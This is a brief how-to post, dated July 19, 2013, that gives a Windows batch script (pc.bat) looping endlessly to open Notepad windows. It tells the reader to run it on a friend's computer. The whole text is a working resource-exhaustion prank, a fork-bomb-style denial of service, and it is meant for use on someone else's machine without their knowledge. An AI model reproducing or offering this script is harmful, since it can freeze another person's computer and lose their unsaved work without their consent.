Jul 19, 2013
To do so perform the following steps :
1. Type this code in the notepad
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
2. Save it as pc.bat
3. Take this file to your friends computer and just run it once.